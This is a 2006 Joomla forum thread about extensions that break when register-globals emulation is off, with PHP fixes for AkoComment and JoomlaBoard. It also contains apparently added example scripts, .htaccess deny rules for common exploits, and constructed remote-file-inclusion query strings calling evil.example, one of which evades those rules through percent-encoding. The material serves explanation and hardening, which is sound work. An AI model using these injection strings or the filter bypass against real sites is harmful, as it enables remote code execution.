Components not working with Register Globals Emulation off
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
- Websmurf
- Joomla! Hero
- Posts: 2230
- Joined: Fri Aug 19, 2005 2:23 pm
- Location: The Netherlands
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Updated the list again.
Adam van Dongen - Developer
- Blocklist, ODT Indexer, EasyFAQ, Easy Guestbook, Easy Gallery, YaNC & Redirect -
http://www.joomla-addons.org - http://www.bandhosting.nl
- mjvvorst
- Joomla! Apprentice
- Posts: 38
- Joined: Sun Sep 18, 2005 9:25 pm
- Location: Netherlands
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat,
Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
Mark
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
mjvvorst wrote:
> Beat,
> Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
> CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
> Mark
My sentiments exactly Beat. I did confirm the fix to now work on the front-end w/RG emulation off. However, I did not test the backend yet, though I'm sure mjvvorst's backend AkoComment problem will be the same as mine (i.e. unable to delete AkoComments w/RG emulation off).
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
mjvvorst wrote:
> Beat,
> Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
> CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
> Mark
In my version of AkoComment the buttons to delete were missing in the code.
I added that code, but as it's not GPL, I can't publish it.
I'm adding to my post above the code for making the backend work with RG_EMULATION.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- mjvvorst
- Joomla! Apprentice
- Posts: 38
- Joined: Sun Sep 18, 2005 9:25 pm
- Location: Netherlands
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat,
Works like a charm in the backend. Thanks!
At this time of night....do you ever sleep !?
- fan2
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Aug 21, 2006 3:37 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Hello,
I am using CB 1.0RC2 with SMF Bridge.
It appears that there are some issues in Single Sign-on in the SMF bridge if you upgrade CB 1.0RC2 to 1.0.1.
The PHP register_globals variable is set to ON.
But I have set RG_EMULATION to 0 in globals.php.
Also, in my .htaccess file, I have added the following:
Code:
########## START
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a CONFIG_EXT variable via URL
RewriteCond %{QUERY_STRING} CONFIG_EXT\[LANGUAGES_DIR\](=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
########## End - Rewrite rules to block out some common exploits
Do you think I am temporarily protected against any hack via CB 1.0RC2 before I find a solution about the bridge?
Thanks for your help.
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
mjvvorst wrote:
> Beat,
> Works like a charm in the backend. Thanks!
> At this time of night....do you ever sleep !?
I tested the same backend AkoComment scenario, both with and without Beat's hotfix... and his hack makes all the difference, yet again! My RG emulation is off BTW.
Last edited by tyler on Fri Aug 25, 2006 12:19 am, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
mjvvorst wrote:
> Beat,
> Works like a charm in the backend. Thanks!
> At this time of night....do you ever sleep !?
Thanks...
Working on this
http://dev.joomla.org/index.php?option= ... d=33&p=168
with Rey and others keeps me awake tonight...
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
fan2 wrote:
> Hello,
> I am using CB 1.0RC2 with SMF Bridge.
> ...
> Do you think I am temporarily protected against any hack via CB 1.0RC2 before I find a solution about the bridge?
> Thanks for your help.
This .htaccess file should protect you from the most critical vulnerability of RC2. RG_EMULATION 0 doesn't have an influence there, but register_globals OFF (REALLY RECOMMENDED SETTING!) or allow_url_fopen OFF would also protect you.
CB 1.0.1 includes other security fixes as well, so I would still look for a solution to your problem to be able to upgrade in the near future.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
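The rewrite rules fan2 posted, and Beat's remark that register_globals OFF would protect on its own, are worth checking against concrete input. The script below is added here as an example; it is not code from either post or from Joomla. It replays the RewriteCond patterns as PCRE against raw query strings, the way mod_rewrite sees them (%{QUERY_STRING} is matched before any URL-decoding), and prints what PHP would have put into $_GET for the same string after decoding. The query strings and the host evil.example are constructed for the example. Two caveats the rule set does not cover: a condition on QUERY_STRING never sees a POST body or a Cookie header, so with register_globals ON the same variable can still arrive by those routes; and an attacker can percent-encode a character inside the variable name, which mod_rewrite does not decode but PHP does.

```php
<?php
// Added example for this thread, not code from fan2's post or from Joomla.
// Replays the .htaccess RewriteCond patterns as PCRE against raw query strings,
// the way mod_rewrite sees them (no URL-decoding), and shows what PHP would have
// put into $_GET for the same string after decoding.

$rules = [
    'mosConfig'  => '/mosConfig_[a-zA-Z_]{1,21}(=|%3D)/',
    'base64'     => '/base64_encode.*\(.*\)/',
    'script'     => '/(<|%3C).*script.*(>|%3E)/i',          // [NC] => case-insensitive
    'GLOBALS'    => '/GLOBALS(=|\[|%[0-9A-Z]{0,2})/',
    '_REQUEST'   => '/_REQUEST(=|\[|%[0-9A-Z]{0,2})/',
    'CONFIG_EXT' => '/CONFIG_EXT\[LANGUAGES_DIR\](=|\[|%[0-9A-Z]{0,2})/',
];

/** Name of the first rule that fires on this raw query string, or null if none does. */
function matchingRule(array $rules, string $rawQuery)
{
    foreach ($rules as $name => $pattern) {
        if (preg_match($pattern, $rawQuery) === 1) {
            return $name;
        }
    }
    return null;
}

// Constructed query strings; evil.example is a placeholder host.
$cases = [
    'option=com_content&task=view&id=12',
    'mosConfig_absolute_path=http://evil.example/shell.txt%3F',
    'GLOBALS[mosConfig_absolute_path]=http://evil.example/shell.txt%3F',
    'search=%3Cscript%3Ealert(1)%3C/script%3E',
    // Same payload with the underscores encoded as %5F: the literal "mosConfig_"
    // never appears in the raw string, so no rule fires, yet PHP decodes %5F to "_"
    // and $_GET ends up with the very key the first rule was meant to block.
    'mosConfig%5Fabsolute%5Fpath=http://evil.example/shell.txt%3F',
];

foreach ($cases as $raw) {
    parse_str($raw, $decoded);                        // what $_GET would contain
    printf("%-66s rule: %-10s \$_GET keys: %s\n",
        $raw, matchingRule($rules, $raw) ?? '(none)', implode(', ', array_keys($decoded)));
}
```

Run from the command line, the first four cases come out as expected (no rule, mosConfig, GLOBALS, script); the fifth case matches no rule while still decoding to the key mosConfig_absolute_path. That is why such rules are a stop-gap in front of register_globals, not a replacement for turning it off.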
-
- Joomla! Apprentice
- Posts: 12
- Joined: Thu Aug 18, 2005 7:56 am
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Something I found useful is Team Calendar Pro from www.lewe.com, but to my disappointment this component requires register_globals = on; otherwise it does not function properly.
I had spent much time updating the code to use $_SERVER["PHP_SELF"] in place of $PHP_SELF but still have not got the 2.8.001 version to work productively.
I was wondering whether someone could look into this interesting component and see if help can be rendered for it.
Thanks in advance.
- fan2
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Aug 21, 2006 3:37 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat wrote:
> fan2 wrote:
> > Hello,
> > I am using CB 1.0RC2 with SMF Bridge.
> > ...
> > Do you think I am temporarily protected against any hack via CB 1.0RC2 before I find a solution about the bridge?
> > Thanks for your help.
> This .htaccess file should protect you from the most critical vulnerability of RC2. RG_EMULATION 0 doesn't have an influence there, but register_globals OFF (REALLY RECOMMENDED SETTING!) or allow_url_fopen OFF would also protect you.
> CB 1.0.1 includes other security fixes as well, so I would still look for a solution to your problem to be able to upgrade in the near future.
Thanks BEAT,
As soon as I know that there will be no problem when I upgrade CB1.0RC2 to CB1.0.1, I will do it.
About the PHP register_globals, the hoster does not want to modify it.
-
- Joomla! Apprentice
- Posts: 18
- Joined: Tue Apr 04, 2006 8:53 am
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Hello
I've problems in Joomlaboard with uploading files and pics (after rg_emulation off).
Does it work in yours?
Tom
- MarHaj
- Joomla! Ace
- Posts: 1168
- Joined: Fri Jun 30, 2006 5:24 pm
- Location: CZ
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Provided the first Akocomment BEAT fix concerns akocomment.php and the second admin.akocomment.php, I am afraid that for the tweaked Artistworks.net version of Akocomment 2.0 they do not work.
But, in the name of those who use the non-tweaked version: Beat, THANKS!! You saved our sites (and souls)!!!
Last edited by MarHaj on Fri Aug 25, 2006 5:29 pm, edited 1 time in total.
MarHaj
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
fan2 wrote:
> ...
> About the PHP register_globals, the hoster does not want to modify it.
My free advice: change hoster when you can, that one seems not to understand basic PHP security (or server config) in year 2006.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- kunglao
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Is anyone else experiencing the same problem ?
Thanks,
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
kunglao wrote:
> With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
> That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
> If RG_EMULATION is set back to ON, there's no problem.
> Is anyone else experiencing the same problem ?
> Thanks,
I have the exact same issue with being unable to add OR unsubscribe topic subscriptions with RG emulation off.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- kunglao
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
kunglao wrote:
> With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
> That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
> If RG_EMULATION is set back to ON, there's no problem.
The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.php:
Code:
if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , '');
if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
Since I'm new to this, I'd appreciate expert members to validate the fix.
Thanks in advance,
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
kunglao wrote:
> The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.php
> Somehow, $_POST wouldn't work but $_REQUEST does.
> Code:
> if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , '');
> if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
thx for sharing kunglao, that fix seems to be working for me too.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
$_REQUEST is just a more general array that contains the contents of the $_POST, $_GET, and $_COOKIE arrays... best used when you aren't sure whether the request will be in Get or Post format... There shouldn't be any problems with its use in that scenario.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
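The one-line fixes collected in this thread all follow the same pattern: stop expecting a request parameter to show up as a plain PHP variable and fetch it by name instead. The script below is added here as an example; it is not code from the thread, from Joomla or from JoomlaBoard. It simulates what register_globals (and, in spirit, Joomla 1.0's RG_EMULATION) does with an incoming request, then shows the explicit retrieval. The request data is constructed, and getParam() is a hypothetical stand-in for mosGetParam() (the real function also runs Joomla's input filter on string values). It also shows the caveat that goes with Rob's note on $_REQUEST: with the default variables_order=EGPCS and no request_order, PHP registers cookies into $_REQUEST after GET and POST, so a cookie of the same name overrides the form value.

```php
<?php
// Added example, not code from the thread, from Joomla or from JoomlaBoard.
// Shows what register_globals (and, in spirit, Joomla 1.0's RG_EMULATION) does
// with a request, and the explicit retrieval the fixes in this thread move to.
// All request data is constructed; getParam() is a hypothetical stand-in for
// mosGetParam() (the real one also runs Joomla's input filter on strings).

// A value the component trusts, as set by configuration.php.
$mosConfig_absolute_path = '/var/www/joomla';

// Constructed request. Cookie and GET both carry "thread": with variables_order=EGPCS
// and no request_order, $_REQUEST registers cookies last, so the cookie value wins.
$_GET    = ['option' => 'com_joomlaboard', 'thread' => '42'];
$_POST   = ['mosConfig_absolute_path' => 'http://evil.example/shell.txt?'];
$_COOKIE = ['thread' => '7'];
$request = array_merge($_GET, $_POST, $_COOKIE);   // stand-in for $_REQUEST under EGPCS

// 1. Register-globals behaviour: every request key becomes a global variable.
function emulateRegisterGlobals(array $request)
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;              // silently clobbers $mosConfig_absolute_path
    }
}

// 2. Explicit retrieval: a named parameter, from a named source, coerced to a type.
function getParam(array $source, string $name, $default, string $type = 'string')
{
    if (!isset($source[$name])) {
        return $default;
    }
    switch ($type) {
        case 'int':
            return (int) $source[$name];
        case 'string':
            return is_string($source[$name]) ? trim($source[$name]) : $default;
        default:
            return $source[$name];
    }
}

emulateRegisterGlobals($request);
echo "emulation: mosConfig_absolute_path = $mosConfig_absolute_path\n";
//   -> http://evil.example/shell.txt? : a later include of "$mosConfig_absolute_path/..."
//      fetches remote code wherever remote includes are permitted (allow_url_fopen,
//      later allow_url_include)
echo "emulation: thread = $thread\n";          // 7, the cookie, not the URL's 42

$mosConfig_absolute_path = '/var/www/joomla';  // reset, then the explicit variant
$thread = getParam($_GET, 'thread', 0, 'int'); // the code, not the client, picks the source
echo "explicit:  mosConfig_absolute_path = $mosConfig_absolute_path, thread = $thread\n";
//   -> /var/www/joomla and 42; nothing else in the request reaches a PHP variable
```

Reading from $_REQUEST, as the posted fixes do, is a convenient way to keep a component working for both its GET links and its POST forms, but a value that changes state (subscribe, delete) should be read from $_POST only, so that it cannot be triggered by a crafted link and cannot be overridden by a cookie.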
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
kunglao wrote:
> kunglao wrote:
> > With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
> > That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
> > If RG_EMULATION is set back to ON, there's no problem.
> The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.php
> Somehow, $_POST wouldn't work but $_REQUEST does.
> Code:
> if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , '');
> if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
> Since I'm new to this, I'd appreciate expert members to validate the fix.
> Thanks in advance,
Thanks for proposing the fix and also for confirming. Added to the other fixes in my post to group them together.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
When I set RG emulation back to on, the attachment uploads work again.
Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
tyler wrote:
> the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
> When I set RG emulation back to on, the attachment uploads work again.
> Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
Confirmed... files + images didn't work + "subscribe me" option on posts/reply.
The fix below fixes that: add to joomlaboard.php, next to the other fixes, this:
Code:
if (!isset($subscribeMe) && isset($_POST["subscribeMe"])) $subscribeMe = mosGetParam ( $_POST, 'subscribeMe' , ''); //BBTEMPFIX
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', ''); //BBTEMPFIX
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', ''); //BBTEMPFIX
Can you please confirm the fix fixes all three functions?
EDIT: changed code above.
Last edited by Beat on Sun Aug 27, 2006 7:02 am, edited 1 time in total.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- Hackwar
- Joomla! Virtuoso
- Posts: 3788
- Joined: Fri Sep 16, 2005 8:41 pm
- Location: NRW - Germany
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Hey Beat,
don't forget the fix I sent in. You have to add this on line 170 of /administrator/components/com_joomlaboard/admin.joomlaboard.php for viewing user details:
Code:
$uid = mosGetParam( $_REQUEST, 'uid', array(0) );
if (!is_array( $uid )) {
    $uid = array(0);
}
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.
Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat wrote:
> tyler wrote:
> > the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
> > When I set RG emulation back to on, the attachment uploads work again.
> > Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
> Confirmed... files + images didn't work + "subscribe me" option on posts/reply.
> Fix below fixes that: add to joomlaboard.php other fixes this:
> Adding to my post http://forum.joomla.org/index.php/topic ... #msg441456
> Code:
> if (!isset($subscribeMe) && isset($_POST["subscribeMe"])) $subscribeMe = mosGetParam ( $_POST, 'subscribeMe' , ''); //BBTEMPFIX
> if (!isset($attachimage) && isset($_POST["attachimage"])) $attachimage = mosGetParam ( $_POST, 'attachimage' , ''); //BBTEMPFIX
> if (!isset($attachfile) && isset($_POST["attachfile"])) $attachfile = mosGetParam ( $_POST, 'attachfile' , ''); //BBTEMPFIX
> Can you please confirm the fix fixes all three functions ?
Hmmm, the image and file upload do not work for me when using that fix w/RG emulation off, but the subscribe to thread option does work in that scenario. I even tried a version of those fixes where $_POST is changed to $_REQUEST and I got the same non-working results for img & file uploads. This is w/RG Emulation off. Works fine with RG Emulation off.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
is it possible that maybe the $_FILES var needs to be adjusted for RG? Was looking a little bit in the joomlaboard file_upload.php & image_upload.php and saw $_FILES used there.
not sure what to tinker with it though to make it recognizeable under RG off
and as I mentioned earlier, the subscribe me does work, just not the file or image uploads for me.
Last edited by tyler on Sat Aug 26, 2006 7:49 pm, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
- kunglao
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
tyler wrote:
> and as I mentioned earlier, the subscribe me does work, just not the file or image uploads for me.
I confirm Tyler's problem: "subscribe me" also works for me but not the file/image upload, even with $_REQUEST.
kunglao
P.S. Thanks to all for your previous feedback.
- kunglao
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
To fix the joomlaboard file/image upload, this seems to work for me:
Code:
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', '');
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', '');
And in this case, given that $attachfile & $attachimage are used just like a flag in the code, can we not bypass mosGetParam instead:
Code:
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = $_FILES['attachimage']['name'];
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = $_FILES['attachfile']['name'];
Beat, Rob, or other experts, any reservation on either option?
Thanks,
KungLao
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
You should always filter input to your PHP code. The first code example which utilizes mosGetParam is the way you should be doing it... I suggest you apply the same practices to the second code example.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
kunglao wrote:
> To fix the joomlaboard file/image upload, this seems to work for me:
> Code:
> if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', '');
> if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', '');
> And in this case, given that $attachfile & $attachimage are used just like a flag in the code, can we not bypass mosGetParam instead:
> Code:
> if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = $_FILES['attachimage']['name'];
> if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = $_FILES['attachfile']['name'];
> Beat, Rob, or other experts, any reservation on either option?
> Thanks,
> KungLao
1) Kudos for the find of my stupid mistake in the fix. Actually the culprit using these variables wrongly is post.php ;)
2) Both variants are strictly identical for now, as those variables are arrays, and mosGetParam does not filter/modify arrays (its expected behavior until now).
3) I have carefully checked the files and image uploads in joomlaBoard from a security point of view using those parameters. The use in post.php is safe, as it's only testing if it's non-null values. I did not find critical vulnerabilities from this point of view (you need to check this when not using mosGetParam).
Will update my posts above...
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
How about the following four other variables used respectively in image_upload.php & file_upload.php:
$_FILES['attachimage']['size'] ---> $imageSize
$_FILES['attachimage']['tmp_name']
$_FILES['attachfile']['size'] ---> $fileSize
$_FILES['attachfile']['tmp_name']
Do these need to be accounted for in the same or a similar way?
Last edited by tyler on Sun Aug 27, 2006 7:21 am, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
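Code that already reads $_FILES['attachimage']['size'] or ['tmp_name'] directly does not depend on register_globals at all; only code that expects a bare variable does. Under register_globals PHP populated that bare variable (here $attachimage) with the temporary file path, and set $attachimage_name, $attachimage_size and $attachimage_type alongside it, whereas the fixes in this thread set it to the client-supplied 'name'. That is harmless while the variable is only tested for presence, as Beat notes, but it is a reason to have the upload code take every field from $_FILES itself. The handler below is added here as an example; it is not code from the thread or from JoomlaBoard. The directory, size limit and extension list are hypothetical choices for the example.

```php
<?php
// Added example, not code from the thread or from JoomlaBoard. An upload handler that
// takes everything from $_FILES, never from register_globals-style variables, and makes
// the checks the upload code must make. Directory, size limit and extension list are
// hypothetical choices for this example.

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;
const ALLOWED_EXT      = ['jpg', 'jpeg', 'png', 'gif', 'zip', 'pdf'];
const IMAGE_EXT        = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Validate one $_FILES entry (e.g. $_FILES['attachfile']) and move it into $destDir.
 * Returns the server-chosen file name; throws RuntimeException with the reason otherwise.
 */
function storeUpload(array $upload, string $destDir)
{
    // 'error' is set by PHP, not by the client: check it before touching anything else.
    if (!isset($upload['error']) || $upload['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or no file sent (error ' . ($upload['error'] ?? '?') . ')');
    }
    // 'size' also comes from PHP, but bound it here independently of upload_max_filesize.
    if ($upload['size'] <= 0 || $upload['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file empty or too large');
    }
    // 'tmp_name' must be a file PHP itself received, not a path smuggled in by the request.
    if (!is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('tmp_name is not an uploaded file');
    }
    // 'name' and 'type' are client-controlled: use 'name' only to pick an extension,
    // and never trust 'type'.
    $ext = strtolower(pathinfo(basename($upload['name']), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException("extension not allowed: '$ext'");
    }
    if (in_array($ext, IMAGE_EXT, true) && @getimagesize($upload['tmp_name']) === false) {
        throw new RuntimeException('file claims to be an image but is not one');
    }
    // Server-chosen name: no user input ever becomes part of the path.
    $stored = bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($upload['tmp_name'], rtrim($destDir, '/') . '/' . $stored)) {
        throw new RuntimeException('could not move uploaded file');
    }
    return $stored;
}

// In the component: the presence test the thread's one-line fixes reduce to, then the
// real validation. (Nothing happens when run from the command line: $_FILES is empty.)
if (isset($_FILES['attachfile']) && $_FILES['attachfile']['error'] !== UPLOAD_ERR_NO_FILE) {
    try {
        $name = storeUpload($_FILES['attachfile'], __DIR__ . '/uploads');
        echo "stored as $name\n";
    } catch (RuntimeException $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```

The extension whitelist only controls the name the file is stored under; the directory it lands in should be outside the document root, or one where the web server does not execute scripts, so that a file that slipped through cannot be run.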